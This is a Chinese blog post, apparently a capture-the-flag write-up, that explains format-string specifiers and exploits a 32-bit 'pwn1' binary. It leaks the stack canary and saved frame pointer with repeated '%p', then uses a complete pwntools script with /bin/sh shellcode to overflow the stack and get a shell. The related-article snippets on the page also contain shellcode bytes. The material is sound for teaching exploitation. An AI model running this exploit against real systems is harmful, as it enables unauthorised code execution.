格式化字符串漏洞

最新推荐文章于 2021-07-07 13:17:16 发布
最新推荐文章于 2021-07-07 13:17:16 发布
阅读量371 收藏
点赞数 1
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43613144/article/details/97428158
版权

格式化字符串漏洞

格式化字符串漏洞原理
首先了解一下什么是格式化字符串:格式化字符串是用来告诉程序如何进行格式化输出的说明符。
引用参考文件的内容。附上
https://veritas501.space/2017/04/28/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/#more.

   
%c:输出字符,配上%n可用于向指定地址写数据。
%d:输出十进制整数,配上%n可用于向指定地址写数据。
%x:输出16进制数据,如%i$x表示要泄漏偏移i处4字节长的16进制数据,%i$lx表示要泄漏偏移i处8字节长的16进制数据,32bit和64bit环境下一样。
%p:输出16进制数据,与%x基本一样,只是附加了前缀0x,在32bit下输出4字节,在64bit下输出8字节,可通过输出字节的长度来判断目标环境是32bit还是64bit。
%s:输出的内容是字符串,即将偏移处指针指向的字符串输出,如%i$s表示输出偏移i处地址所指向的字符串,在32bit和64bit环境下一样,可用于读取GOT表等信息。
%n:将%n之前printf已经打印的字符个数赋值给偏移处指针所指向的地址位置,如%100x%10$n表示将0x64写入偏移10处保存的指针所指向的地址(4字节),
%$hn表示写入的地址空间为2字节,
%$hhn表示写入的地址空间为1字节,
%$lln表示写入的地址空间为8字节,在32bit和64bit环境下一样。有时,直接写4字节会导致程序崩溃或等候时间过长,可以通过%$hn或%$hhn来适时调整。
%n是通过格式化字符串漏洞改变程序流程的关键方式,而其他格式化字符串参数可用于读取信息或配合%n写数据。

首先第一步还是检查一下
在这里插入图片描述发现没有开NX,可以用shellcode,开了Canary,

把题放到IDA中,反编译看一下主函数代码
在这里插入图片描述
在这里插入图片描述
然后在get_message函数中有个printf函数。我们发现输出没有标明输出的类型,这就造成了一个漏洞
我们就找到这个printf的地址,在此下断点
在这里插入图片描述

下面用gdb进行调试
在这里插入图片描述
在这里插入图片描述
入栈
在这里插入图片描述
然后就一直回车知道看到栈底
我们知道这个canary位于栈底上方一点
在这里插入图片描述

我们要算一下Canary的地址和栈底的地址
在这里插入图片描述
转换为十进制
在这里插入图片描述
因为这个是32位的,所以是4个字节4个字节的
136/4=34
124/4=31
所以栈底的地址是33,canary的地址是30(从零开始计数)

from pwn import *

shellcode="\x31\xc0\x31\xd2\x31\xdb\x31\xc9\x31\xc0\x31\xd2\x52\x68\x2f\x2f" \
    "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x31\xc0\xb0" \
    "\x0b\xcd\x80\n"
context.log_level='debug'
p=process("./pwn1")
#p=remote('172.16.80.240',8000)


#########################leak canary,prev_ebp_addr################
p.recvuntil('name:')     #接收信息直到name为止
p.sendline('%p.'*40)     
leak_data=p.recvuntil('messages:')  #接收信息直到messages为止
address=leak_data.split('.')   #用点分隔  
for i in range(len(address)):
	print str(i)+':'+str(address[i])  #得到地址
canary=address[30]   #canary地址
print "canary="+canary
prev_ebp_addr=address[33]  #栈底地址
print "stack_addr="+prev_ebp_addr

#########################get shellcode_addr########################
shellcode_addr=int(prev_ebp_addr,16)-144+0x8  

#########################send shellcode and get shell##############
payload='a'*100+p32(int(canary,16))+'A'*12+p32(shellcode_addr)+shellcode
p.sendline(payload)
p.interactive()

“shellcode_addr=int(prev_ebp_addr,16)-144+0x8”
144是栈底的虚拟地址和真实地址之差
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

奈方时歇
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
从脚本编写中学到的encode函数坑(未解决)
黑夜黎明
06-05 782
开篇 无限接近成功 铺垫 离奇的填充EIP数值 转折 锁定encode函数
【基础教程】Python转义字符及用法
matinal 當冬夜漸暖 。公众号:matinal
05-08 1768
ASCII 编码为每个字符都分配了唯一的编号,称为编码值。在 Python 中,一个 ASCII 字符除了可以用它的实体(也就是真正的字符)表示,还可以用它的编码值表示。这种使用编码值来间接地表示字符的方式称为转义字符(Escape Character)。 转义字符以\0或者\x开头,以\0开头表示后跟八进制形式的编码值,以\x开头表示后跟十六进制形式的编码值,Python 中的转义字符只能...
转义字符
不依法度的博客
12-05 1240
字符集(Character Set)为每个字符分配了唯一的编号,我们不妨将它称为编码值。在C语言中,一个字符除了可以用它的实体(也就是真正的字符)表示,还可以用编码值表示。这种使用编码值来间接地表示字符的方式称为转义字符(Escape Character)。 转义字符以\或者\x开头,以\开头表示后跟八进制形式的编码值,以\x开头表示后跟十六进制形式的编码值。对于转义字符来说,只能使用八进制或者十六进制。 字符 1、2、3、a、b、c 对应的 ASCII 码的八进制形式分别是 61、62、63、141、14
Linux实验——缓冲区溢出漏洞实验
weixin_30855761的博客
04-23 464
Linux实验——缓冲区溢出漏洞实验 20125102 王朝阳 一、 实验描述 缓冲区溢出是指程序试图向缓冲区写入超出预分配固定长度数据的情况。这一漏洞可以被恶意用户利用来改变程序的流控制,甚至执行代码的任意片段。这一漏洞的出现是由于数据缓冲器和返回地址的暂时关闭,溢出会引起返回地址被重写。 二、 实验准备 实验楼提供的是64位Ubuntu linux(系统用户名shiy...
栈溢出攻击c语言_linux漏洞攻击。使用漏洞攻击代码进行栈溢出漏洞攻击
weixin_39578513的博客
12-21 137
该楼层疑似违规已被系统折叠隐藏此楼查看此楼下面给出源代码:#include #include #include #include char shellcode[] ="\x31\xc0\x31\xdb\xb0\x17\xcd\x80""\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\...
Windows 平台下的堆溢出、格式化字符串漏洞利用技术
04-09
### Windows 平台下的堆溢出与格式化字符串漏洞利用技术 #### 一、概述 在探讨Windows平台下的堆溢出以及格式化字符串漏洞利用技术之前,我们需要理解这两种漏洞的基本概念及其潜在的安全风险。 **堆溢出**是指当...
格式化字符串漏洞检测1
08-08
**格式化字符串漏洞详解** 格式化字符串漏洞是一种常见的安全漏洞,主要出现在C语言或类似C语言的编程环境中,其中程序员使用了不安全的格式化字符串函数,如`printf`、`scanf`、`snprintf`等。这些函数允许攻击者...
转义字符作用
wshbr1314的博客
07-07 1855
转义字符,顾名思义就是转换反斜杠后面的意思,C语言中定义了一些字母前加"\"来表示常见的那些不能显示的ASCII字符,如\0,\t,\n等,就称为转义字符,因为\n=换行,不再是简单的字母n 转义字符的转换过程还是根据ASCII码表进行转换,该表中有可以显示的字符,像字母、特殊符号 也有不能显示的字符,像回车、制表。 该表中已经表示好值与符合之间的对应关系,我们可以用ASCII表达式来表示一个字符型常量,或者用单引号内加反斜杠表示转义字符。我们可以用'\x31'表示字符1 ...
python 单反格式转格式_python input()键盘输入8583报文带有\x单反斜杠自动转义问题解决办法...
weixin_39954889的博客
12-20 334
用input()输入的字符串是8385报文比如:\x30\x30\x30\x30。。。,但是输入后,代码把8583报文字符串中多加了一个\,类似\\x30。但是我把input()代码注释掉,把8583报文在变量中写死,就没有这个问题,我想应该是编码问题造成的。input输入和变量固定,难道还有什么不一样吗?代码如下:输入的单反斜杠,被系统自动转义双反斜杠\\x,代码中增加了依据判断:if "\\x...
怎样破坏程序的堆栈?
热门推荐
guang11cheng的专栏
08-16 1万+
为什么使用堆栈?    现代计算机被设计成能够理解人们头脑中的高级语言。 在使用高级语言构造程序时最重要的技术是过程(procedure)和函数(function)。 从这一点来看, 一个过程调用可以象跳转(jump)命令那样改变程序的控制流程, 但是与跳转不同的是, 当工作完成时, 函数把控制权返回给调用之后的语句或指令。这种高级抽象实现起来要靠堆栈的帮助。 堆栈也用于给函数中使用的局部变量动
【3】 缓冲区溢出 符号位溢出 运算溢出
如梦如幻的博客
04-29 2012
本文主要介绍通过运算溢出的符号位溢出,以绕过限制长度,最终达到溢出目的。
把"Hello, World\n"转为机器码shellcode 来显示
~ 飞 扬 的 天 空 ~
12-27 3717
源码 #include const unsigned char shellcode[] = "\xeb\x19\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04"\ "\xb2\x0e\x59\xb3\x01\xcd\x80\x31\xc0\xb0\x01"\ "\x31\xdb
造成segment fault,产生core dump的可能原因
那些年....的专栏
05-17 1001
1.内存访问越界 a) 由于使用错误的下标,导致数组访问越界 b) 搜索字符串时,依靠字符串结束符来判断字符串是否结束,但是字符串没有正常的使用结束符 c) 使用strcpy, strcat, sprintf, strcmp, strcasecmp等字符串操作函数,将目标字符串读/写爆。应该使用strncpy, strlcpy, strncat, strlcat, snprintf, str
pwn1 格式化字符串泄露canary
qq_44832048的博客
07-27 876
前面在终端中查看保护机制和32位在前面提到过就不讲了, 只不过在这里只开启了Canary,所以我们可以用格式化字符串漏洞泄露出栈上保存的Canary,没有开启NX,说明堆栈可执行,我们可以在第二次输入中直接把shellcode布置到栈里面,然后返回到栈里 用ida简单看了一下,就是让你输入名字,然后调用get_message函数输出你的名字,让你留言,留言有溢出漏洞,显然用了printf,也有...
Linux二进制保护(文末福利)
人邮异步社区
01-15 4731
本文将会探索Linux程序混淆的基本技术和动机。通过对二进制文件进行混淆或者加密来保护二进制文件不被篡改的技术被称作软件保护。说到软件保护,指的是二进制保护或者二进制加固技术。二进制加固并不是Linux所独有的,事实上,Windows操作系统有许多关于二进制加固的产品,可供讨论的例子非常多。 许多人没有意识到的是,Linux在这方面也有一定的市场,尽管这方面的技术主要应用于政府使用的反篡改软件产
栈溢出攻击1——注入shellcode指令拿到shell
学习记录
09-15 2080
  在IDA的Function name这一栏里面,如下图所示,没有发现后门函数,说明这道题目需要自己写shellcode来拿到shell权限。 查看sub_80484E9函数的伪代码,如下所示。 int sub_80484E9() { char v1; // [esp+0h] [ebp-28h] puts("Could I know your name?"); myRead((int)&unk_804A060, 32); printf("Hi, %s.\n", &unk
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值